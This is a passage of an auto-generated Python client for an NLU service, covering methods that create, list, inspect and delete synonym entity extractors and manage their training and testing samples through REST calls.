:param list[SynonymSample] synonym_sample_list: List of synonym samples. (required)
:param str x_caller:
:return: list[SynonymSample]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.synonym_entity_extractor_add_testing_samples_with_http_info(instance_name, synonym_sample_list, **kwargs) # noqa: E501
else:
(data) = self.synonym_entity_extractor_add_testing_samples_with_http_info(instance_name, synonym_sample_list, **kwargs) # noqa: E501
return data
def synonym_entity_extractor_add_testing_samples_with_http_info(self, instance_name, synonym_sample_list, **kwargs): # noqa: E501
"""Add testing samples. # noqa: E501
        Add testing samples to the named extractor. Returns the samples added to the instance. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_add_testing_samples_with_http_info(instance_name, synonym_sample_list, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param list[SynonymSample] synonym_sample_list: List of synonym samples. (required)
:param str x_caller:
:return: list[SynonymSample]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['instance_name', 'synonym_sample_list', 'x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method synonym_entity_extractor_add_testing_samples" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'instance_name' is set
if ('instance_name' not in params or
params['instance_name'] is None):
raise ValueError("Missing the required parameter `instance_name` when calling `synonym_entity_extractor_add_testing_samples`") # noqa: E501
# verify the required parameter 'synonym_sample_list' is set
if ('synonym_sample_list' not in params or
params['synonym_sample_list'] is None):
raise ValueError("Missing the required parameter `synonym_sample_list` when calling `synonym_entity_extractor_add_testing_samples`") # noqa: E501
collection_formats = {}
path_params = {}
if 'instance_name' in params:
path_params['instance_name'] = params['instance_name'] # noqa: E501
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'synonym_sample_list' in params:
body_params = params['synonym_sample_list']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/synonym_entity_extractors/{instance_name}/testing_samples', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[SynonymSample]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def synonym_entity_extractor_add_training_samples(self, instance_name, synonym_sample_list, **kwargs): # noqa: E501
"""Add training samples. # noqa: E501
        Add training samples to the named extractor. Returns the samples added to the instance. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_add_training_samples(instance_name, synonym_sample_list, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param list[SynonymSample] synonym_sample_list: List of synonym samples. (required)
:param str x_caller:
:return: list[SynonymSample]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.synonym_entity_extractor_add_training_samples_with_http_info(instance_name, synonym_sample_list, **kwargs) # noqa: E501
else:
(data) = self.synonym_entity_extractor_add_training_samples_with_http_info(instance_name, synonym_sample_list, **kwargs) # noqa: E501
return data
def synonym_entity_extractor_add_training_samples_with_http_info(self, instance_name, synonym_sample_list, **kwargs): # noqa: E501
"""Add training samples. # noqa: E501
        Add training samples to the named extractor. Returns the samples added to the instance. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_add_training_samples_with_http_info(instance_name, synonym_sample_list, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param list[SynonymSample] synonym_sample_list: List of synonym samples. (required)
:param str x_caller:
:return: list[SynonymSample]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['instance_name', 'synonym_sample_list', 'x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method synonym_entity_extractor_add_training_samples" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'instance_name' is set
if ('instance_name' not in params or
params['instance_name'] is None):
raise ValueError("Missing the required parameter `instance_name` when calling `synonym_entity_extractor_add_training_samples`") # noqa: E501
# verify the required parameter 'synonym_sample_list' is set
if ('synonym_sample_list' not in params or
params['synonym_sample_list'] is None):
raise ValueError("Missing the required parameter `synonym_sample_list` when calling `synonym_entity_extractor_add_training_samples`") # noqa: E501
collection_formats = {}
path_params = {}
if 'instance_name' in params:
path_params['instance_name'] = params['instance_name'] # noqa: E501
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'synonym_sample_list' in params:
body_params = params['synonym_sample_list']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/synonym_entity_extractors/{instance_name}/training_samples', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[SynonymSample]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def synonym_entity_extractor_create(self, create_details, **kwargs): # noqa: E501
"""Create a synonym entity extractor. # noqa: E501
Create a new synonym entity extractor or reload one from the trash. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_create(create_details, async_req=True)
>>> result = thread.get()
:param async_req bool
:param SynonymEntityExtractorCreateDetails create_details: The details of the instance to create. (required)
:param str x_caller:
:return: SynonymEntityExtractorInstanceDetail
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.synonym_entity_extractor_create_with_http_info(create_details, **kwargs) # noqa: E501
else:
(data) = self.synonym_entity_extractor_create_with_http_info(create_details, **kwargs) # noqa: E501
return data
def synonym_entity_extractor_create_with_http_info(self, create_details, **kwargs): # noqa: E501
"""Create a synonym entity extractor. # noqa: E501
Create a new synonym entity extractor or reload one from the trash. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_create_with_http_info(create_details, async_req=True)
>>> result = thread.get()
:param async_req bool
:param SynonymEntityExtractorCreateDetails create_details: The details of the instance to create. (required)
:param str x_caller:
:return: SynonymEntityExtractorInstanceDetail
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['create_details', 'x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method synonym_entity_extractor_create" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'create_details' is set
if ('create_details' not in params or
params['create_details'] is None):
raise ValueError("Missing the required parameter `create_details` when calling `synonym_entity_extractor_create`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'create_details' in params:
body_params = params['create_details']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/synonym_entity_extractors', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SynonymEntityExtractorInstanceDetail', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
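    # Editor's sketch (not generated code): creating an extractor and handling
    # API errors. The ApiException import path follows the swagger-codegen
    # layout used by this package, and the create-details field name is an
    # assumption.
    #
    #     from feersum_nlu.rest import ApiException
    #     try:
    #         detail = api.synonym_entity_extractor_create(
    #             SynonymEntityExtractorCreateDetails(name="my_extractor"))
    #     except ApiException as e:
    #         print("create failed: %s" % e)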
def synonym_entity_extractor_del(self, instance_name, **kwargs): # noqa: E501
"""Delete named instance. # noqa: E501
Delete and get the details of the named synonym entity extractor instance. Deleted models can be reloaded from the trash with the create operation. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_del(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:return: SynonymEntityExtractorInstanceDetail
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.synonym_entity_extractor_del_with_http_info(instance_name, **kwargs) # noqa: E501
else:
(data) = self.synonym_entity_extractor_del_with_http_info(instance_name, **kwargs) # noqa: E501
return data
def synonym_entity_extractor_del_with_http_info(self, instance_name, **kwargs): # noqa: E501
"""Delete named instance. # noqa: E501
Delete and get the details of the named synonym entity extractor instance. Deleted models can be reloaded from the trash with the create operation. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_del_with_http_info(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:return: SynonymEntityExtractorInstanceDetail
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['instance_name', 'x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method synonym_entity_extractor_del" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'instance_name' is set
if ('instance_name' not in params or
params['instance_name'] is None):
raise ValueError("Missing the required parameter `instance_name` when calling `synonym_entity_extractor_del`") # noqa: E501
collection_formats = {}
path_params = {}
if 'instance_name' in params:
path_params['instance_name'] = params['instance_name'] # noqa: E501
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/synonym_entity_extractors/{instance_name}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SynonymEntityExtractorInstanceDetail', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def synonym_entity_extractor_del_testing_samples(self, instance_name, synonym_sample_list, **kwargs): # noqa: E501
"""Delete testing samples. # noqa: E501
Delete the listed testing samples of the named extractor. Returns the deleted samples. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_del_testing_samples(instance_name, synonym_sample_list, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param list[SynonymSample] synonym_sample_list: List of synonym samples. (required)
:param str x_caller:
:return: list[SynonymSample]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.synonym_entity_extractor_del_testing_samples_with_http_info(instance_name, synonym_sample_list, **kwargs) # noqa: E501
else:
(data) = self.synonym_entity_extractor_del_testing_samples_with_http_info(instance_name, synonym_sample_list, **kwargs) # noqa: E501
return data
def synonym_entity_extractor_del_testing_samples_with_http_info(self, instance_name, synonym_sample_list, **kwargs): # noqa: E501
"""Delete testing samples. # noqa: E501
Delete the listed testing samples of the named extractor. Returns the deleted samples. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_del_testing_samples_with_http_info(instance_name, synonym_sample_list, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param list[SynonymSample] synonym_sample_list: List of synonym samples. (required)
:param str x_caller:
:return: list[SynonymSample]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['instance_name', 'synonym_sample_list', 'x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method synonym_entity_extractor_del_testing_samples" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'instance_name' is set
if ('instance_name' not in params or
params['instance_name'] is None):
raise ValueError("Missing the required parameter `instance_name` when calling `synonym_entity_extractor_del_testing_samples`") # noqa: E501
# verify the required parameter 'synonym_sample_list' is set
if ('synonym_sample_list' not in params or
params['synonym_sample_list'] is None):
raise ValueError("Missing the required parameter `synonym_sample_list` when calling `synonym_entity_extractor_del_testing_samples`") # noqa: E501
collection_formats = {}
path_params = {}
if 'instance_name' in params:
path_params['instance_name'] = params['instance_name'] # noqa: E501
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'synonym_sample_list' in params:
body_params = params['synonym_sample_list']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/synonym_entity_extractors/{instance_name}/testing_samples', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[SynonymSample]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def synonym_entity_extractor_del_testing_samples_all(self, instance_name, **kwargs): # noqa: E501
"""Delete all testing samples. # noqa: E501
Delete all testing samples of the named extractor. Returns the deleted samples. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_del_testing_samples_all(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:return: list[SynonymSample]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.synonym_entity_extractor_del_testing_samples_all_with_http_info(instance_name, **kwargs) # noqa: E501
else:
(data) = self.synonym_entity_extractor_del_testing_samples_all_with_http_info(instance_name, **kwargs) # noqa: E501
return data
def synonym_entity_extractor_del_testing_samples_all_with_http_info(self, instance_name, **kwargs): # noqa: E501
"""Delete all testing samples. # noqa: E501
Delete all testing samples of the named extractor. Returns the deleted samples. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_del_testing_samples_all_with_http_info(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:return: list[SynonymSample]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['instance_name', 'x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method synonym_entity_extractor_del_testing_samples_all" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'instance_name' is set
if ('instance_name' not in params or
params['instance_name'] is None):
raise ValueError("Missing the required parameter `instance_name` when calling `synonym_entity_extractor_del_testing_samples_all`") # noqa: E501
collection_formats = {}
path_params = {}
if 'instance_name' in params:
path_params['instance_name'] = params['instance_name'] # noqa: E501
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/synonym_entity_extractors/{instance_name}/testing_samples_all', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[SynonymSample]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def synonym_entity_extractor_del_training_samples(self, instance_name, synonym_sample_list, **kwargs): # noqa: E501
"""Delete training samples. # noqa: E501
Delete the listed training samples of the named extractor. Returns the deleted samples. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_del_training_samples(instance_name, synonym_sample_list, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param list[SynonymSample] synonym_sample_list: List of synonym samples. (required)
:param str x_caller:
:return: list[SynonymSample]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.synonym_entity_extractor_del_training_samples_with_http_info(instance_name, synonym_sample_list, **kwargs) # noqa: E501
else:
(data) = self.synonym_entity_extractor_del_training_samples_with_http_info(instance_name, synonym_sample_list, **kwargs) # noqa: E501
return data
def synonym_entity_extractor_del_training_samples_with_http_info(self, instance_name, synonym_sample_list, **kwargs): # noqa: E501
"""Delete training samples. # noqa: E501
Delete the listed training samples of the named extractor. Returns the deleted samples. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_del_training_samples_with_http_info(instance_name, synonym_sample_list, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param list[SynonymSample] synonym_sample_list: List of synonym samples. (required)
:param str x_caller:
:return: list[SynonymSample]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['instance_name', 'synonym_sample_list', 'x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method synonym_entity_extractor_del_training_samples" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'instance_name' is set
if ('instance_name' not in params or
params['instance_name'] is None):
raise ValueError("Missing the required parameter `instance_name` when calling `synonym_entity_extractor_del_training_samples`") # noqa: E501
# verify the required parameter 'synonym_sample_list' is set
if ('synonym_sample_list' not in params or
params['synonym_sample_list'] is None):
raise ValueError("Missing the required parameter `synonym_sample_list` when calling `synonym_entity_extractor_del_training_samples`") # noqa: E501
collection_formats = {}
path_params = {}
if 'instance_name' in params:
path_params['instance_name'] = params['instance_name'] # noqa: E501
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'synonym_sample_list' in params:
body_params = params['synonym_sample_list']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/synonym_entity_extractors/{instance_name}/training_samples', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[SynonymSample]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def synonym_entity_extractor_del_training_samples_all(self, instance_name, **kwargs): # noqa: E501
"""Delete all training samples. # noqa: E501
Delete all training samples of the named extractor. Returns the deleted samples. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_del_training_samples_all(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:return: list[SynonymSample]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.synonym_entity_extractor_del_training_samples_all_with_http_info(instance_name, **kwargs) # noqa: E501
else:
(data) = self.synonym_entity_extractor_del_training_samples_all_with_http_info(instance_name, **kwargs) # noqa: E501
return data
def synonym_entity_extractor_del_training_samples_all_with_http_info(self, instance_name, **kwargs): # noqa: E501
"""Delete all training samples. # noqa: E501
Delete all training samples of the named extractor. Returns the deleted samples. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_del_training_samples_all_with_http_info(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:return: list[SynonymSample]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['instance_name', 'x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method synonym_entity_extractor_del_training_samples_all" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'instance_name' is set
if ('instance_name' not in params or
params['instance_name'] is None):
raise ValueError("Missing the required parameter `instance_name` when calling `synonym_entity_extractor_del_training_samples_all`") # noqa: E501
collection_formats = {}
path_params = {}
if 'instance_name' in params:
path_params['instance_name'] = params['instance_name'] # noqa: E501
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/synonym_entity_extractors/{instance_name}/training_samples_all', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[SynonymSample]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def synonym_entity_extractor_get_details(self, instance_name, **kwargs): # noqa: E501
"""Get details of named instance. # noqa: E501
Get the details of the named synonym entity extractor instance. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_get_details(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:return: SynonymEntityExtractorInstanceDetail
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.synonym_entity_extractor_get_details_with_http_info(instance_name, **kwargs) # noqa: E501
else:
(data) = self.synonym_entity_extractor_get_details_with_http_info(instance_name, **kwargs) # noqa: E501
return data
def synonym_entity_extractor_get_details_with_http_info(self, instance_name, **kwargs): # noqa: E501
"""Get details of named instance. # noqa: E501
Get the details of the named synonym entity extractor instance. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_get_details_with_http_info(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:return: SynonymEntityExtractorInstanceDetail
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['instance_name', 'x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method synonym_entity_extractor_get_details" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'instance_name' is set
if ('instance_name' not in params or
params['instance_name'] is None):
raise ValueError("Missing the required parameter `instance_name` when calling `synonym_entity_extractor_get_details`") # noqa: E501
collection_formats = {}
path_params = {}
if 'instance_name' in params:
path_params['instance_name'] = params['instance_name'] # noqa: E501
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/synonym_entity_extractors/{instance_name}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SynonymEntityExtractorInstanceDetail', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def synonym_entity_extractor_get_details_all(self, **kwargs): # noqa: E501
"""Get list of synonym entity extractors. # noqa: E501
Get the list of synonym entity extractors. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_get_details_all(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str x_caller:
:return: list[SynonymEntityExtractorInstanceDetail]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.synonym_entity_extractor_get_details_all_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.synonym_entity_extractor_get_details_all_with_http_info(**kwargs) # noqa: E501
return data
def synonym_entity_extractor_get_details_all_with_http_info(self, **kwargs): # noqa: E501
"""Get list of synonym entity extractors. # noqa: E501
Get the list of synonym entity extractors. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_get_details_all_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str x_caller:
:return: list[SynonymEntityExtractorInstanceDetail]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method synonym_entity_extractor_get_details_all" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
